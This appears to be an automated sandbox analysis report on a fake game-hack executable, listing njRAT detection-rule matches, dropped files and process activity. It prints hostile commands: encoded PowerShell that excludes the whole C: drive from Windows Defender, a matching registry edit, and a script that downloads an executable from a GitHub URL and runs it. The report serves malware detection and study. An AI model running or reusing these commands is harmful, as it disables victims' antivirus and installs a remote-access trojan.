Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\ClickMe.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA== Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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 Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_00E8AC86 NtQuerySystemInformation, 2_2_00E8AC86
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_00E8AC55 NtQuerySystemInformation, 2_2_00E8AC55
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0098AF02 NtQuerySystemInformation, 16_2_0098AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0098BC72 NtSetInformationProcess, 16_2_0098BC72
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0098BC50 NtSetInformationProcess, 16_2_0098BC50
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0098AED1 NtQuerySystemInformation, 16_2_0098AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 22_2_013BAF02 NtQuerySystemInformation, 22_2_013BAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 22_2_013BAED1 NtQuerySystemInformation, 22_2_013BAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 23_2_014EAF02 NtQuerySystemInformation, 23_2_014EAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 23_2_014EAED1 NtQuerySystemInformation, 23_2_014EAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_0060AF02 NtQuerySystemInformation, 25_2_0060AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_0060AED1 NtQuerySystemInformation, 25_2_0060AED1
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_012A139B 2_2_012A139B
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_012A15B3 2_2_012A15B3
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_012A1600 2_2_012A1600
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_0292AF08 3_2_0292AF08
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_0292C1B8 3_2_0292C1B8
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_0292DE28 3_2_0292DE28
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_065B8EE8 3_2_065B8EE8
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_065B9D31 3_2_065B9D31
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F5CB40 3_2_07F5CB40
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F57808 3_2_07F57808
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F577F9 3_2_07F577F9
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F56738 3_2_07F56738
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F59AAF 3_2_07F59AAF
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F5DA47 3_2_07F5DA47
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F9BCC0 3_2_07F9BCC0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F93BED 3_2_07F93BED
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F90750 3_2_07F90750
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F95AF0 3_2_07F95AF0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F95ADF 3_2_07F95ADF
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_081109E0 3_2_081109E0
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0099118A 16_2_0099118A
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0099152E 16_2_0099152E
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_00DD0EC0 16_2_00DD0EC0
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_00DDD038 16_2_00DDD038
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_00DD3D08 16_2_00DD3D08
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_00DD8738 16_2_00DD8738
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_00DD0E90 16_2_00DD0E90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_0471B4A0 18_2_0471B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_0471B490 18_2_0471B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_083B3A98 18_2_083B3A98
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\webhook.exe 780BF370F55BED41C91E40A07DB66BF12059F38E8AD1B9481DA1748BEA29FF48
Source: HugeHack 1.3.exe.bin.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: HugeHack 1.3.exe.bin.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: HugeHack 1.3.exe.bin.exe Static PE information: Resource name: RT_RCDATA type: Java archive data (JAR)
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1232460461.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamejavaw.exeN vs HugeHack 1.3.exe.bin.exe
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewebhooker2.exe6 vs HugeHack 1.3.exe.bin.exe
Source: HugeHack 1.3.exe.bin.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
